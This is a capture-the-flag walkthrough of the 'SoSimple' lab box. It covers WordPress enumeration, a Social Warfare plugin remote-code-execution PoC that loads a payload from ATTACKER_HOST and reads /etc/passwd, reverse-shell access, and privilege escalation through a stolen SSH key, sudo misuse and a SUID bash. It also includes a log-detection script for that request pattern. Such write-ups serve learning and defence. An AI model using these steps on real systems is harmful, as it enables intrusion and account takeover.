SoSimple - Proving Grounds Play
Enumeration
Nmap
Initial nmap scan revealed HTTP and SSH ports were open.
Web Enumeration
The website included a PNG and nothing else.
So I applied directory brute forcing and found a WordPress endpoint.
Then I ran WPScan and found valid users.
However, I could not find the users’ passwords by brute forcing.
Later, I checked plugin versions and found that the Social Warfare plugin was outdated.
Exploitation
Remote Code Execution
Searching the web, I found a Social Warfare RCE PoC on the official WPScan site. It was simple:
- Create a payload file and host it at a location reachable by the targeted website. Payload content: "<pre>system('cat /etc/passwd')</pre>"
- Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
- The content of /etc/passwd will be returned
So first, I created a reverse shell payload and hosted it.
Then I visited the URL from step 2 of the PoC.
Then I simply got a reverse shell.
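The request pattern in the PoC above (admin-post.php with swp_debug=load_options and a remote swp_url) is easy to spot in web server logs. The following detection script is an added example, not part of the original writeup or of WPScan; the log lines and addresses in it are constructed, and it assumes Apache combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined style, hypothetical hosts and addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://198.51.100.7/payload.txt HTTP/1.1" 200 512 "-" "curl/7.88"
203.0.113.5 - - [10/Oct/2023:12:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:12:00:03 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.1" 200 300 "-" "python-requests/2.31"
203.0.113.9 - - [10/Oct/2023:12:00:04 +0000] "GET /wp-admin/admin-post.php?action=heartbeat HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the client, timestamp, request target and status of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def social_warfare_rfi_url(target: str):
    """Return the remote swp_url if the request target matches the PoC pattern, else None.

    Pattern: a request to admin-post.php carrying swp_debug=load_options together with an
    swp_url that points at an http(s) host, i.e. a file the plugin would fetch remotely.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-post.php"):
        return None
    qs = parse_qs(parts.query)  # percent-decodes values, so encoded variants are caught too
    if qs.get("swp_debug", [""])[0] != "load_options":
        return None
    url = qs.get("swp_url", [""])[0]
    remote = urlsplit(url)
    if remote.scheme in ("http", "https") and remote.hostname:
        return url
    return None


def scan_log(text: str):
    """Return a list of (client, status, remote_url) tuples, one per matching log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = social_warfare_rfi_url(m.group("target"))
        if url:
            hits.append((m.group("client"), int(m.group("status")), url))
    return hits


if __name__ == "__main__":
    for client, status, url in scan_log(SAMPLE_LOG):
        print(f"ALERT client={client} status={status} remote_file={url}")
```

A hit with a 200 status is worth treating as a likely successful fetch; the remote host in swp_url is the one to block and investigate.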
Rabbit Hole 1
Initially I checked wp-config.php, and it was useless. Then I found a secretkey.txt file, but it was a rabbit hole.
Then I checked the users’ home directories and found the user flag.
Privilege Escalation
Rabbit Hole 2
There was a second rabbit hole in max’s home directory.
id_rsa
The id_rsa of max was readable by www-data.
So I simply copied it and logged in as max over SSH.
Running service as steven
The sudo -l command revealed that max could run the service command as the steven user. There was a GTFOBins page for the service command; I simply followed its sudo privilege escalation steps and obtained a shell as steven.
sudo -l to root
The steven user could run a script as root, but the script did not exist.
I simply created that script to set the SUID bit on /bin/bash, then obtained a root shell and the root flag.